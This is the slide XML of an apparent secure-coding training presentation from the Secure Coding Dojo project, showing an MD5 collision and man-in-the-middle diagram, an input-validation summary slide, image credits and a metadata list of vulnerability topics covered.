              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(Expected File)=1234</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Graphic 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75A33F9F-A32F-E540-A42C-9D07A416B9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1" y="3595241"/>
            <a:ext cx="952500" cy="952500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFA0CE29-9A34-0A45-8D83-CC2098AE5897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4298751" y="4329520"/>
            <a:ext cx="1098750" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MD5 Collision</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C38ED64E-B341-1642-843D-A9FBF87B9F8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61896" r="2089" b="6904"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3555739" y="4478508"/>
            <a:ext cx="718457" cy="926275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66EA79ED-CBF7-BB49-8052-48FFDEC69A68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2772219" y="5299503"/>
            <a:ext cx="2262992" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MD5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(Malware)=1234</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD9CB3F3-206D-4946-8128-7B6D87BE8FB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2772219" y="3142044"/>
            <a:ext cx="1849161" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download Server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(Not Secure)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{298FAB52-A2FE-9848-AE0A-ECC0CA43FFA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6108997" y="3351797"/>
            <a:ext cx="955682" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Man-in-the-middle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47" name="Picture 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF10C84C-F030-284A-BF43-67AE53ABD7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810" t="32962" r="2089" b="37637"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3605693" y="4478508"/>
            <a:ext cx="718457" cy="872837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{748B11ED-0A1D-8340-A96B-916DDFDC4BC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7980089" y="1482290"/>
            <a:ext cx="3411263" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="2800" dirty="0"/>
              <a:t>Crypto algorithms are continuously put to the test so we must keep them up to date. MD5 is known to be exposed to collisions when two different files can result in the same checksum.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1749412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9758-27B6-9240-A111-07C6CCEDC834}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10931434" cy="1325563"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6600" b="1" dirty="0"/>
              <a:t>To sum all it up…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B49A2D4B-3B23-1342-8309-15AAAD946A82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1891430"/>
            <a:ext cx="10931434" cy="4570376"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reduce the attack surface </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>by enforcing accessing objects through identifiers rather than actual representation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Identifiers can be input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>validated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>easier, also solve encoding issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="901461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733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11DB-8A29-1944-8DE2-A35F5350BD0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="123545"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Image Credits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EE49923-874C-4145-AA56-4D7B19A488D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1328635"/>
            <a:ext cx="10515600" cy="4932316"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Image and base design elements courtesy of Pixabay.com – Royalty Free Images (Free for commercial use, No attribution required)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Although crediting not required we really want to thank the artists:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>8212733 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://pixabay.com/photos/woman-laptop-business-blogging-3190829/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Janson_G - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://pixabay.com/photos/knight-crusader-isolated-2939429/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>mohamed_hassan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://pixabay.com/photos/europe-gdpr-data-privacy-3256079</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Pexels - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://pixabay.com/photos/coding-computer-hacker-hacking-1841550/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Photo Mix - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://pixabay.com/photos/house-keys-key-the-door-castle-1407562/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>PublicDomainPictures - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://pixabay.com/photos/board-card-chip-computer-data-22098/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>MTZD - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://pixabay.com/vectors/icon-file-extension-document-2488093/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Stux - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://pixabay.com/photos/black-board-chalk-traces-school-1072366/</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1800" dirty="0"/>
              <a:t>StruffelProductions - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://pixabay.com/photos/code-programming-love-computer-3078609/</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-CA" sz="1800" dirty="0"/>
              <a:t>TeroVasalainen - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://pixabay.com/photos/question-mark-hand-drawn-solution-2123969/</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Attack-Grams created by Paul Ionescu and distributed through the Secure Coding Dojo project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-CA" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3598560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14247</TotalTime>
  <Words>2432</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>501</Paragraphs>
  <Slides>92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Arial</vt:lpstr>
      <vt:lpstr>Bradley Hand</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Cambria Math</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>medium-content-serif-font</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Secure Coding 101</vt:lpstr>
      <vt:lpstr>Content Creator</vt:lpstr>
      <vt:lpstr>About Secure Coding Dojo</vt:lpstr>
      <vt:lpstr>Attack-Grams</vt:lpstr>
      <vt:lpstr>Authentication Bypass</vt:lpstr>
      <vt:lpstr>Reliance on Untrusted Inputs</vt:lpstr>
      <vt:lpstr>Missing/Incorrect Authorization</vt:lpstr>
      <vt:lpstr>Missing Encryption of Sensitive Data</vt:lpstr>
      <vt:lpstr>Use of a Broken Crypto Algorithm</vt:lpstr>
      <vt:lpstr>Unsalted Hash</vt:lpstr>
      <vt:lpstr>Password Guessing</vt:lpstr>
      <vt:lpstr>Integer Overflow</vt:lpstr>
      <vt:lpstr>Download of Code Without Integrity Check</vt:lpstr>
      <vt:lpstr>Open Redirect</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery</vt:lpstr>
      <vt:lpstr>Upload of Dangerous File</vt:lpstr>
      <vt:lpstr>XML External Entities</vt:lpstr>
      <vt:lpstr>Path Traversal</vt:lpstr>
      <vt:lpstr>OS Command Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>Insecure Deserialization</vt:lpstr>
      <vt:lpstr>Buffer Overflow</vt:lpstr>
      <vt:lpstr>Format String Injection</vt:lpstr>
      <vt:lpstr>Preventing Software Attacks</vt:lpstr>
      <vt:lpstr>The Tip of the Iceberg</vt:lpstr>
      <vt:lpstr>Input Validation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Special Characters Not Needed</vt:lpstr>
      <vt:lpstr>Input Validation Function Example</vt:lpstr>
      <vt:lpstr>A Simple Multi-Purpose Function</vt:lpstr>
      <vt:lpstr>Vulnerabilities=F(Input/(1+Validation))</vt:lpstr>
      <vt:lpstr>Attacks Prevented by Input Validation</vt:lpstr>
      <vt:lpstr>How About the Irish?</vt:lpstr>
      <vt:lpstr>To sum all it up…</vt:lpstr>
      <vt:lpstr>CONCATENATION</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>ORM Frameworks</vt:lpstr>
      <vt:lpstr>To sum all it up…</vt:lpstr>
      <vt:lpstr>Problems with Memory</vt:lpstr>
      <vt:lpstr>Memory Safer Functions </vt:lpstr>
      <vt:lpstr>Check Boundaries</vt:lpstr>
      <vt:lpstr>Memory Injection?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Securing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Protect the Web UIs</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Defending against XSS</vt:lpstr>
      <vt:lpstr>HTML Encoding Neutralizes XSS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 all it up…</vt:lpstr>
      <vt:lpstr>Indirect Object References</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>To sum all it up…</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Image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Code Review 101</dc:title>
  <dc:creator>Paul Ionescu</dc:creator>
  <cp:lastModifiedBy>Paul Ionescu (RD-CA)</cp:lastModifiedBy>
  <cp:revision>117</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-17T15:44:29Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-10T16:07:00Z</dcterms:modified>
